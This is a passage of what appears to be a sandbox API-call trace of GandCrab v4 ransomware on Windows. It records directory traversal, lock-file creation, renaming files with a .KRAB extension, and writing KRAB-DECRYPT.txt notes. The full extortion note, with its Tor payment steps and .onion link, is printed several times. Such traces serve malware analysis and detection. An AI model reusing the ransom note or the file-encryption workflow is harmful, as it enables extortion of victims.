BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0057.512] WriteFile (in: hFile=0x3ac, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338eaa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338eaa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0057.513] CloseHandle (hObject=0x3ac) returned 1 [0057.514] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.514] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.515] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x4, wMilliseconds=0x2ce)) [0057.515] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0057.515] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0057.515] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0057.515] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\d2ca4a08d2ca4dee3d.lock") returned 85 [0057.515] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\macromedia\\flash player\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3ac [0057.517] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.517] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.517] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\") returned 62 [0057.517] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\*" [0057.517] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\*", lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0xfbd360 [0057.517] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0057.517] FindNextFileW (in: hFindFile=0xfbd360, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0057.517] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0057.517] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0057.517] FindNextFileW (in: hFindFile=0xfbd360, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0057.517] lstrcmpW (lpString1="#SharedObjects", lpString2=".") returned -1 [0057.517] lstrcmpW (lpString1="#SharedObjects", lpString2="..") returned -1 [0057.518] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\", lpString2="#SharedObjects" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects" [0057.518] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\" [0057.518] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0057.518] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0057.518] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0057.518] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0057.518] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0057.518] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.518] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.518] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\\\KRAB-DECRYPT.txt") returned 94 [0057.519] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\macromedia\\flash player\\#sharedobjects\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0057.519] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0057.519] WriteFile (in: hFile=0x440, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e820, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e820*=0x1f6e, lpOverlapped=0x0) returned 1 [0057.520] CloseHandle (hObject=0x440) returned 1 [0057.520] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.521] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.521] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x4, wMilliseconds=0x2ce)) [0057.521] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0057.521] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0057.521] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0057.522] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\d2ca4a08d2ca4dee3d.lock") returned 100 [0057.522] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\macromedia\\flash player\\#sharedobjects\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x440 [0057.524] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.524] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.524] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\") returned 77 [0057.524] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\*" [0057.524] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\*", lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 0xfbd8a0 [0057.524] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0057.524] FindNextFileW (in: hFindFile=0xfbd8a0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0057.525] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0057.525] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0057.525] FindNextFileW (in: hFindFile=0xfbd8a0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0057.525] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0057.525] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0057.525] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\d2ca4a08d2ca4dee3d.lock" [0057.525] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.525] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 105 [0057.525] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\d2ca4a08d2ca4dee3d.lock") returned 100 [0057.525] lstrlenW (lpString=".lock") returned 5 [0057.525] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0057.525] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0057.525] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.526] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.526] FindNextFileW (in: hFindFile=0xfbd8a0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0057.526] lstrcmpW (lpString1="DQQHJZ8C", lpString2=".") returned 1 [0057.526] lstrcmpW (lpString1="DQQHJZ8C", lpString2="..") returned 1 [0057.526] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\", lpString2="DQQHJZ8C" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C" [0057.526] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C\\" [0057.526] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0057.526] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0057.526] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0057.526] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0057.526] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0057.526] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.527] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.527] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C\\\\KRAB-DECRYPT.txt") returned 103 [0057.527] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\DQQHJZ8C\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\macromedia\\flash player\\#sharedobjects\\dqqhjz8c\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x448 [0057.529] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB 